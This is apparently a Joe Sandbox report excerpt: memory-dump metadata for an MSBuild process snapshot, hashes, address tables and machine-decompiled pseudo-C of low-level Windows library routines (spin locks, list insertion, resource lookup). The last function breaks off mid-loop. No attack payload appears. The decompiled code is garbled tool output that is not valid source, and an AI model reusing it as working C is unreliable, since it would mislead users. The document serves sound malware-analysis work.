                                                                                                0x010cdcda
                                                                                                0x010cdcdc
                                                                                                0x010cdcdc
                                                                                                0x010cdce2
                                                                                                0x010cdce4
                                                                                                0x00000000
                                                                                                0x010cdce4

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ff96490887eeee65f82175a46d64734277bfbf68eda415f6b5c55c6748dc227f
                                                                                                • Instruction ID: 188e03c0cba8308973171fa88be36033efa7cc5df66e5c627692ff02ebff4645
                                                                                                • Opcode Fuzzy Hash: ff96490887eeee65f82175a46d64734277bfbf68eda415f6b5c55c6748dc227f
                                                                                                • Instruction Fuzzy Hash: 2A516D71E0061ADBCB14DFA8C480AAEFBF5BB49710F24816ED595A7345EB70A944CFD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010BEF40 Relevance: .1, Instructions: 147COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 96%
                                                                                                			E010BEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E010A9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77d0c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E010A2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                                                0x010bef4b
                                                                                                0x010bef4d
                                                                                                0x010bef57
                                                                                                0x010bf0bd
                                                                                                0x010bf0c2
                                                                                                0x010bf0d2
                                                                                                0x010bf0d2
                                                                                                0x010bf0c2
                                                                                                0x010bef5d
                                                                                                0x010bef5f
                                                                                                0x010bef67
                                                                                                0x010bef6a
                                                                                                0x010bef6d
                                                                                                0x010bef74
                                                                                                0x010bef7f
                                                                                                0x010bef82
                                                                                                0x010bef82
                                                                                                0x010bef86
                                                                                                0x010bef88
                                                                                                0x010bef8c
                                                                                                0x010bef8f
                                                                                                0x010bef8f
                                                                                                0x010bef8f
                                                                                                0x00000000
                                                                                                0x010bef91
                                                                                                0x010bef93
                                                                                                0x010befc4
                                                                                                0x010befc4
                                                                                                0x010befc4
                                                                                                0x010befca
                                                                                                0x010befd0
                                                                                                0x010bf0a6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010bf0af
                                                                                                0x0110bb06
                                                                                                0x0110bb0a
                                                                                                0x010bf0b5
                                                                                                0x010bf0b5
                                                                                                0x010bf0b5
                                                                                                0x010bf0b5
                                                                                                0x00000000
                                                                                                0x010befd6
                                                                                                0x010befd9
                                                                                                0x010bf0de
                                                                                                0x010bf0e2
                                                                                                0x010befdf
                                                                                                0x010befdf
                                                                                                0x010befdf
                                                                                                0x010befe5
                                                                                                0x0110bafc
                                                                                                0x0110bafc
                                                                                                0x010befe5
                                                                                                0x010befeb
                                                                                                0x010befed
                                                                                                0x010bf00f
                                                                                                0x010bf011
                                                                                                0x010bf01a
                                                                                                0x010bf01d
                                                                                                0x010bf021
                                                                                                0x010bf028
                                                                                                0x010bf029
                                                                                                0x010bf029
                                                                                                0x010bf02c
                                                                                                0x00000000
                                                                                                0x010bf02c
                                                                                                0x010beff3
                                                                                                0x010beff9
                                                                                                0x010bf0ea
                                                                                                0x010bf0ed
                                                                                                0x010bf0ef
                                                                                                0x00000000
                                                                                                0x010bf0ef
                                                                                                0x010bf003
                                                                                                0x0110bb12
                                                                                                0x010bf045
                                                                                                0x010bf049
                                                                                                0x010bf051
                                                                                                0x010bf09e
                                                                                                0x010bf0a0
                                                                                                0x010bf0a0
                                                                                                0x010bf09e
                                                                                                0x010bf053
                                                                                                0x010bf064
                                                                                                0x010bf064
                                                                                                0x010bf06b
                                                                                                0x0110bb1a
                                                                                                0x0110bb1a
                                                                                                0x010bf071
                                                                                                0x010bf071
                                                                                                0x010bf07d
                                                                                                0x010bf082
                                                                                                0x010bf08f
                                                                                                0x010bf08f
                                                                                                0x010bf009
                                                                                                0x010bf00d
                                                                                                0x00000000
                                                                                                0x010bf00d
                                                                                                0x010befd0
                                                                                                0x010bef97
                                                                                                0x010befa5
                                                                                                0x010befaa
                                                                                                0x00000000
                                                                                                0x010befac
                                                                                                0x010befac
                                                                                                0x010befac
                                                                                                0x00000000
                                                                                                0x010befb2
                                                                                                0x010bf036
                                                                                                0x010bf03a
                                                                                                0x010bf040
                                                                                                0x010bf090
                                                                                                0x00000000
                                                                                                0x010bf092
                                                                                                0x010bf042
                                                                                                0x00000000
                                                                                                0x010bf042
                                                                                                0x010befb7
                                                                                                0x010befb9
                                                                                                0x010befbc
                                                                                                0x010befb0
                                                                                                0x010befb0
                                                                                                0x00000000
                                                                                                0x010befbe
                                                                                                0x010befbe
                                                                                                0x010befc1
                                                                                                0x00000000
                                                                                                0x010befc1
                                                                                                0x010befbc
                                                                                                0x010befaa
                                                                                                0x010bef91

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                • Instruction ID: e214cd1dfdac734e8826bfd5e002e8bdd4d27b7bce25cff46f5823b5eb365ee4
                                                                                                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                • Instruction Fuzzy Hash: 8551D130E0424ADFEB25CB6CC5D4BEEBBF1AF05314F1881E8E58597292C375A989C791
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0117740D Relevance: .1, Instructions: 141COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 84%
                                                                                                			E0117740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E010FD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E010EF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L010C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L010C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E010EF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L010C4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                                                0x0117740d
                                                                                                0x0117740d
                                                                                                0x01177412
                                                                                                0x01177413
                                                                                                0x01177416
                                                                                                0x01177418
                                                                                                0x0117741c
                                                                                                0x0117741f
                                                                                                0x01177422
                                                                                                0x01177422
                                                                                                0x01177428
                                                                                                0x0117742a
                                                                                                0x0117742a
                                                                                                0x01177451
                                                                                                0x01177432
                                                                                                0x0117744f
                                                                                                0x0117744f
                                                                                                0x00000000
                                                                                                0x01177434
                                                                                                0x01177438
                                                                                                0x01177443
                                                                                                0x01177517
                                                                                                0x01177517
                                                                                                0x0117751a
                                                                                                0x01177535
                                                                                                0x01177520
                                                                                                0x01177527
                                                                                                0x0117752c
                                                                                                0x01177531
                                                                                                0x01177533
                                                                                                0x00000000
                                                                                                0x01177533
                                                                                                0x00000000
                                                                                                0x01177531
                                                                                                0x0117754b
                                                                                                0x0117754f
                                                                                                0x0117755c
                                                                                                0x0117755c
                                                                                                0x0117755f
                                                                                                0x01177560
                                                                                                0x01177561
                                                                                                0x01177562
                                                                                                0x01177563
                                                                                                0x01177568
                                                                                                0x0117756a
                                                                                                0x0117756c
                                                                                                0x0117756d
                                                                                                0x0117756d
                                                                                                0x0117756f
                                                                                                0x01177572
                                                                                                0x01177574
                                                                                                0x01177577
                                                                                                0x0117757c
                                                                                                0x0117757f
                                                                                                0x00000000
                                                                                                0x01177551
                                                                                                0x01177551
                                                                                                0x01177551
                                                                                                0x01177553
                                                                                                0x01177553
                                                                                                0x01177449
                                                                                                0x01177449
                                                                                                0x0117744c
                                                                                                0x0117744c
                                                                                                0x00000000
                                                                                                0x0117744c
                                                                                                0x01177443
                                                                                                0x0117750e
                                                                                                0x01177514
                                                                                                0x01177514
                                                                                                0x01177455
                                                                                                0x01177469
                                                                                                0x0117746d
                                                                                                0x00000000
                                                                                                0x01177473
                                                                                                0x01177473
                                                                                                0x01177476
                                                                                                0x01177480
                                                                                                0x01177484
                                                                                                0x0117748e
                                                                                                0x01177493
                                                                                                0x01177493
                                                                                                0x01177496
                                                                                                0x01177499
                                                                                                0x011774a1
                                                                                                0x011774b1
                                                                                                0x011774b5
                                                                                                0x00000000
                                                                                                0x011774bb
                                                                                                0x011774c1
                                                                                                0x011774c1
                                                                                                0x011774c4
                                                                                                0x011774c5
                                                                                                0x011774c6
                                                                                                0x011774c7
                                                                                                0x011774c8
                                                                                                0x011774cd
                                                                                                0x00000000
                                                                                                0x011774d3
                                                                                                0x011774d3
                                                                                                0x011774d6
                                                                                                0x011774d8
                                                                                                0x011774db
                                                                                                0x011774dd
                                                                                                0x011774e0
                                                                                                0x011774e7
                                                                                                0x011774ee
                                                                                                0x011774ee
                                                                                                0x011774f4
                                                                                                0x011774f9
                                                                                                0x00000000
                                                                                                0x011774fb
                                                                                                0x011774fb
                                                                                                0x011774fd
                                                                                                0x01177500
                                                                                                0x01177503
                                                                                                0x01177505
                                                                                                0x01177505
                                                                                                0x011774f9
                                                                                                0x00000000
                                                                                                0x011774cd
                                                                                                0x011774b5
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                • Instruction ID: 46dec3bc13ca46589379d0e3a948fdc1ecd505fbf926ce97e54f433a191be042
                                                                                                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                • Instruction Fuzzy Hash: F3519B71600646EFDB2ACF18C484A96BBF5FF45704F15C0AAE908DF252E371E946CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D2990 Relevance: .1, Instructions: 133COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 97%
                                                                                                			E010D2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x117ff00);
				E010FD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1081664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E010EE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1081668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E011251BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x108166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E010D2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E010B6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E010D2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E010BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E010D2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E010D2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E010D2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E010FD0D1(_t62);
				goto L28;
			}





















                                                                                                0x010d2990
                                                                                                0x010d2992
                                                                                                0x010d2997
                                                                                                0x010d29a3
                                                                                                0x010d29a6
                                                                                                0x010d29ab
                                                                                                0x010d29ad
                                                                                                0x010d29b2
                                                                                                0x01115c80
                                                                                                0x010d29b8
                                                                                                0x010d29b8
                                                                                                0x010d29bb
                                                                                                0x010d29c0
                                                                                                0x010d29c5
                                                                                                0x010d29c6
                                                                                                0x010d29c6
                                                                                                0x010d29cb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d29cd
                                                                                                0x010d29d0
                                                                                                0x010d29d9
                                                                                                0x010d29db
                                                                                                0x010d29dd
                                                                                                0x010d2a7f
                                                                                                0x010d2a84
                                                                                                0x010d2a87
                                                                                                0x010d2a89
                                                                                                0x01115ca1
                                                                                                0x01115ca3
                                                                                                0x00000000
                                                                                                0x010d2a8f
                                                                                                0x010d2a8f
                                                                                                0x00000000
                                                                                                0x010d2a8f
                                                                                                0x00000000
                                                                                                0x010d29e3
                                                                                                0x010d29e3
                                                                                                0x010d29e3
                                                                                                0x00000000
                                                                                                0x010d29e3
                                                                                                0x010d29dd
                                                                                                0x00000000
                                                                                                0x010d29db
                                                                                                0x010d29e6
                                                                                                0x010d29e9
                                                                                                0x010d29eb
                                                                                                0x010d29ed
                                                                                                0x010d29f3
                                                                                                0x010d29f5
                                                                                                0x010d29f8
                                                                                                0x010d29fa
                                                                                                0x010d2a97
                                                                                                0x010d2a9a
                                                                                                0x010d2a9d
                                                                                                0x010d2add
                                                                                                0x00000000
                                                                                                0x010d2a9f
                                                                                                0x010d2aa2
                                                                                                0x010d2aa5
                                                                                                0x010d2aa8
                                                                                                0x010d2aab
                                                                                                0x01115cab
                                                                                                0x01115caf
                                                                                                0x01115cc5
                                                                                                0x01115cda
                                                                                                0x01115cdc
                                                                                                0x01115cdf
                                                                                                0x01115ce5
                                                                                                0x00000000
                                                                                                0x01115ceb
                                                                                                0x01115ced
                                                                                                0x01115cee
                                                                                                0x00000000
                                                                                                0x01115cee
                                                                                                0x01115cb1
                                                                                                0x01115cb4
                                                                                                0x01115cb9
                                                                                                0x01115cbb
                                                                                                0x00000000
                                                                                                0x01115cbd
                                                                                                0x01115cbd
                                                                                                0x00000000
                                                                                                0x01115cbd
                                                                                                0x01115cbb
                                                                                                0x010d2ab1
                                                                                                0x010d2ab1
                                                                                                0x010d2ac4
                                                                                                0x010d2ac6
                                                                                                0x010d2ac6
                                                                                                0x00000000
                                                                                                0x010d2ac6
                                                                                                0x010d2aab
                                                                                                0x00000000
                                                                                                0x010d2a00
                                                                                                0x010d2a09
                                                                                                0x010d2a0e
                                                                                                0x010d2a21
                                                                                                0x010d2a24
                                                                                                0x010d2a35
                                                                                                0x010d2a3a
                                                                                                0x010d2a3d
                                                                                                0x010d2a42
                                                                                                0x010d2a59
                                                                                                0x010d2a59
                                                                                                0x010d2a5c
                                                                                                0x010d2a5f
                                                                                                0x010d2a5f
                                                                                                0x010d29fa
                                                                                                0x010d29f3
                                                                                                0x010d2a64
                                                                                                0x010d2a64
                                                                                                0x010d2a6b
                                                                                                0x010d2a6b
                                                                                                0x010d2a6d
                                                                                                0x010d2a72
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a3a8766a1f0f5c8f48ab196eee76ff6b0097732273d46116dff957a6eed9ff83
                                                                                                • Instruction ID: 8e2218c720ff83b757e85a29db03ff394042ea4b672a94ad35b234b44be96776
                                                                                                • Opcode Fuzzy Hash: a3a8766a1f0f5c8f48ab196eee76ff6b0097732273d46116dff957a6eed9ff83
                                                                                                • Instruction Fuzzy Hash: 53516771A0020ADFDF25CF99C880ADEBBB6FF58310F158165F990AB220D3319952CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D4BAD Relevance: .1, Instructions: 131COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 85%
                                                                                                			E010D4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x119d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E010ACC50(_t86);
					L11:
					return E010EB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1198504
				E010C2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E010EFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E010EB0B0();
